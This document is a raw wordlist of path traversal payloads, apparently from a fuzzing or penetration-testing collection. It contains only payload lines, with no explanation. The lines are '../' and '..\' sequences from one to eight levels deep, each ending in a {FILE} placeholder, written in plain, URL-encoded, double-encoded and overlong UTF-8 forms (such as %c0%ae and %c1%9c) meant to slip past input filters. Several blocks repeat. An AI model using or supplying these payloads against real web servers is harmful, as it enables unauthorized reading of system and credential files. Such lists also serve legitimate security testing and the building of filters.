%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
